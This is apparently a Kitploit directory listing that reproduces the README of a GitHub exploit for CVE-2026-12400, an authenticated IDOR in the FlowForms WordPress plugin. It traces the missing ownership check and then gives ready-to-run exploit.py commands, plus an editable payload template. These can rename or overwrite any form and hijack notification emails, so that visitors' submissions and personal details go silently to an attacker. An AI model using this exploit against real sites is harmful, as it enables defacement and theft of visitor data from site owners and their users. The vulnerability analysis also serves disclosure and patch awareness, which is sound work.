Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-12400-Exploit — Authenticated WordPress IDOR exploit for CVE-2026-12400; enumerates FlowForms REST form IDs and modifies form content or hijacks email notifications. | Kitploit
Tools/GitHubGitHub/0x00phantom-hat/cve-2026-12400-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationAPI Security TestingPenetration TestingLearning & Education
GitHub0x00phantom-hat/cve-2026-12400-exploit

CVE-2026-12400-Exploit

Authenticated WordPress IDOR exploit for CVE-2026-12400; enumerates FlowForms REST form IDs and modifies form content or hijacks email notifications.

View Repository
1122 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-12400 — FlowForms IDOR: Unauthorized Form Modification

Authenticated (Contributor+) Insecure Direct Object Reference to Arbitrary Form Modification in FlowForms ≤ 1.1.1

Vulnerability Overview

PropertyValue
CVE IDCVE-2026-12400
CVSS Score4.3 — Medium
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CWECWE-639 (Authorization Bypass Through User-Controlled Key)
ProductFlowForms — WordPress Conversational Form Builder Plugin
AffectedAll versions up to and including 1.1.1
Fixed InFixed in 1.1.2
ResearcherPhantom Hat

Technical Analysis

Full white-box case study with source code analysis, input flow tracing, and patch diffing:

📄 CVE-2026-12400 Case Study — Medium

Attack Surface

FlowForms exposes two REST API endpoints under the flowforms/v1 namespace that are vulnerable:

POST /index.php?rest_route=/flowforms/v1/forms/{id}
POST /index.php?rest_route=/flowforms/v1/forms/{id}/settings

Both accept a user-controlled {id} in the URL path and modify the target form's data — name, content, layout, redirect URL, and email notification recipients.

Root Cause

Both vulnerable route registrations share the same flawed permission_callback:

// Update form content / name
register_rest_route($ns, '/forms/(?P<id>\d+)', [
    'methods'             => WP_REST_Server::EDITABLE,
    'callback'            => [$this, 'update_form'],
    'permission_callback' => fn() => current_user_can('edit_posts'),
]);

// Update form settings (email notifications, layout, etc.)
register_rest_route($ns, '/forms/(?P<id>\d+)/settings', [
    'methods'             => WP_REST_Server::EDITABLE,
    'callback'            => [$this, 'update_settings'],
    'permission_callback' => fn() => current_user_can('edit_posts'),
]);

edit_posts is a capability held by Contributors. The {id} parameter is never checked against the requesting user's ownership — any authenticated user can target any form ID on the site.

Attack Flow

Attacker (Contributor)              FlowForms REST API
        │                                   │
        │── POST /wp-login.php ────────────>│  (1) Authenticate as Contributor
        │<─ wordpress_logged_in cookie ─────│
        │                                   │
        │── GET /wp-admin/post-new.php ────>│  (2) Harvest REST nonce
        │<─ wpApiSettings.nonce ────────────│
        │                                   │
        │── GET /flowform/{id} ────────────>│  (3) Enumerate published forms
        │<─ HTTP 200 ───────────────────────│      (any accessible form is a target)
        │                                   │
        │── POST /flowforms/v1/forms/{id}   │  (4a) Overwrite form name / content
        │       with attacker payload ─────>│       ← no owner check
        │<─ { "success": true } ────────────│
        │                                   │
        │── POST /flowforms/v1/forms/{id}   │  (4b) Hijack email notifications
        │       /settings ─────────────────>│       ← attacker receives all
        │<─ { "success": true } ────────────│         future form submissions
        │                                   │
        │   All 3 attack vectors confirmed  │  (5) Name ✔  Content ✔  Email ✔

Three Attack Vectors

ModeEndpointImpact
name/forms/{id}Rename any form — defacement, social engineering
content/forms/{id}Overwrite layout, welcome/thank-you screens, redirect URL
email/forms/{id}/settingsHijack notification email — silently receive all form submissions

The email mode is the most critical. After hijacking, every submission to the victim's contact form — including visitor PII, messages, and contact details — is silently forwarded to the attacker-controlled address. The site administrator sees no indication of the change.


Exploit Usage

Prerequisites

  • Python 3.8+
  • An authenticated account with at least Contributor role on the target site

Installation

git clone https://github.com/0x00phantom-hat/CVE-2026-12400-Exploit.git
cd CVE-2026-12400-FlowForms-IDOR-Exploit
pip install -r requirements.txt

Modes of Operation

Name Modification

Rename any form to attacker-controlled content:

python3 exploit.py \
  -u http://TARGET \
  --user contributor \
  --password password123 \
  -i 1 -n 100 \
  --exploit name

Content Modification

Overwrite form layout, screens, redirect URL, and background images:

python3 exploit.py \
  -u http://TARGET \
  --user contributor \
  --password password123 \
  -i 1 -n 100 \
  --exploit content

Email Notification Hijack (Highest Impact)

Redirect all future form submission notifications to an attacker-controlled address:

python3 exploit.py \
  -u http://TARGET \
  --user contributor \
  --password password123 \
  -i 1 -n 100 \
  --exploit email

With Proxy (Burp Suite)

python3 exploit.py \
  -u http://TARGET \
  -p http://127.0.0.1:8080 \
  --user contributor \
  --password password123 \
  -i 1 -n 100 \
  --exploit email

Full Flag Reference

FlagShortDescriptionRequired
--url-uTarget WordPress URL✅
--userWordPress username (Contributor+)✅
--passwordWordPress password✅
--id-start-iStarting form ID for enumeration✅
--num-forms-nNumber of form IDs to enumerate✅
--exploitAttack mode: name / content / email✅
--proxy-pProxy URL (e.g. http://127.0.0.1:8080)❌

Customising Payloads

The JSON payload templates (NAME_EDIT, CONTENT_EDIT, EMAIL_EDIT) are defined at the top of the script. Edit them before running to customise the attack content — change the notification email address, redirect URL, background image, form title, etc.

# Top of exploit.py

EMAIL_EDIT = json.loads("""{
    "settings": {
        "email": {
            "enabled": true,
            "notifications": {
                "1": {
                    "email": "[email protected]",   # ← change this
                    ...
                }
            }
        }
    }
}""")

Exploitation Workflow

The exploit performs three automated steps:

Download Tool